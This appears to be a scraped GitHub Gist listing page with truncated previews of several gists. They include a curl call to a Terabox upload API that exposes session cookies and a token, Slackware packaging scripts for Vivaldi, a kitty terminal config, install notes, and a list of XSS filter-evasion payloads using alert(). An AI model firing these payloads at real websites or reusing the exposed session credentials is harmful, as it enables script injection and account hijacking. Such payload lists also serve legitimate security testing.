curl "https://www.terabox.com/api/precreate?channel=dubox&web=1&app_id=250528&clienttype=0&bdstoken=49785c4158da93b4ed3d7619c49e76a4" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" -H "Accept: application/json, text/javascript, */*; q=0.01" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With: XMLHttpRequest" -H "Origin: https://www.terabox.com" -H "Connection: keep-alive" -H "Referer: https://www.terabox.com/disk/home" -H "Cookie: browserid=DC92xGMqqIx7bbsfHbUrfJcTjCaM5UYN1RIM7hryxTb6S84rwr2RkY2N-Ss=; lang=en_US; G_ENABLED_IDPS=google; __stripe_mid=db6a0f0a-8f8c-41e6-93f5-d92c8849f31653ae5c; ndus=YSJIa8TteHuiIVhhRNQKVCcBfa_BEOLXWdUkmu3w; PANWEB=1" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: same-origin" -H "DNT: 1" -H "Sec-GPC: 1" -H "Pragma: no-cache" -H "Cache-Control: no-cache" --data-raw "path="%"2Ftest2.txt&a
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh -eu | |
# This script will convert an official Vivaldi Linux package into Slackware | |
# package format. | |
# | |
# To use, just run this script, followed by the name of the Vivaldi package. | |
# | |
# Note: Since this script was created with Slackware 15 and above in mind, it | |
# uses the new 'douninst.sh' script to clear down any proprietary media libs | |
# fetched by 'update-ffmpeg' during post install. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# vim:fileencoding=utf-8:ft=conf:foldmethod=marker | |
#: Fonts {{{ | |
#: kitty has very powerful font management. You can configure | |
#: individual font faces and even specify special fonts for particular | |
#: characters. | |
font_family JetBrains Mono Medium | |
bold_font JetBrains Mono Bold |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
install browsh in debian / ubuntu, with source mode | |
(links replacement) | |
download firefox esr on download page | |
https://www.mozilla.org/en-US/firefox/organizations/all/ | |
find dowload linux 64 or 32 bit, depends on system architecture | |
example: | |
# wget -4 https://download-installer.cdn.mozilla.net/pub/firefox/releases/60.1.0esr/linux-x86_64/en-US/firefox-60.1.0esr.tar.bz2 |
Product : https://symless.com/synergy
Source code : https://github.com/symless/synergy-core
Windows builds : https://www.brahma.world/synergy-stable-builds/
Centos:
sudo yum install synergy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# latest-Vivaldi Version 1.7.1 | |
# This script will find the latest Vivaldi binary package, download it | |
# and repackage it into Slackware format. | |
# Copyright 2025 Ruari Oedegaard, Oslo, Norway All rights reserved. | |
# | |
# Redistribution and use of this script, with or without modification, | |
# is permitted provided that the following conditions are met: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
><img id=XSS SRC=x onerror=alert(XSS);> | |
;!--"<XSS>=&{()}" | |
<IMG id=XSS SRC="javascript:alert('XSS');"> | |
<IMG id=XSS SRC=javascript:alert('XSS')> | |
<IMG id=XSS SRC=JaVaScRiPt:alert('XSS')> | |
<IMG id=XSS SRC=javascript:alert("XSS")> | |
<IMG id=XSS SRC=`javascript:alert("'XSS'")`> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG id=XSS SRC="jav ascript:alert('XSS');"> |
This page is no longer maintained, go to https://help.vivaldi.com/article/html5-proprietary-media-on-linux/ for help
NewerOlder